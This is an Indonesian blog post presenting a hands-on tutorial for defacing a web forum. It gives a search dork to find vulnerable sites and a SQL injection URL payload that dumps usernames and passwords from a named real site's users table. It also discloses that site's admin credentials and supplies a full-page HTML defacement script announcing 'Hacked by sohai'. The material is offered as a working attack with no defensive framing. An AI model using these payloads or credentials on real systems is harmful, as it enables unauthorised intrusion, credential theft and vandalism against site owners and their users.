THOUSANDS OF FREE BLOGGER TEMPLATES

Selasa, 07 Juni 2011

Deface Forum

dork:

inurl:/forums.asp?iFor=

Pilih target...
Contoh target
http://www.coachgirl.com/forum/forums.asp?iFor=8&offset=58

Hapus angka dibelakang =
Hingga menjadi ini

http://www.coachgirl.com/forum/forums.asp?iFor=

Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users

Hingga menjadi seperti ini
hasil:
http://www.coachgirl.com/forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username Tulisan yg berderet di bawah nama DATED itu adalah passwordnya Cari username admin & passnya. Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password Username : admin Password : default atau anda bisa register dan masukan isi sesuai apa yang tercamtum nie atau langsung saja login mengunakan user saya Username : sohai Password : jangan Sekarang klik tulisan login yg berada diatas. Nah..login udah berhasil Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS" Isi Subject nya... Contoh : HACKED BY sohai lalu masukin script deface HTML nya ke kolom di bawah subject. Hmm...... Jika ingin menutup full seluruh halaman, pake code berikut
code:
<DIV align=center><DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: black 1px; WIDTH: 1300px; BORDER-BOTTOM: black 1px; POSITION: absolute; TOP: 0px; HEIGHT: 7000px; BACKGROUND-COLOR: black; layer-background-color: black"><center> <br><b><font face="papyrus" color="red" size="5">Attacked by : sohai</font></h2><br><br><img src="http://hamzajennings.com/wp-content/uploads/2008/07/hacked_11.jpg" ><br><br> <font face="papyrus" color="red" size="5">This site Hacked by sohai</a><br><br> <font face="papyrus" color="red" size="5">Thanks to my girlfriend </font><br><br><font color="red" size="3">Tasya </DIV>
untuk hasil nya bisa dilihat seperti ini http://www.coachgirl.com/forum/messages.asp?iMsg=331&iFor=8

0 komentar: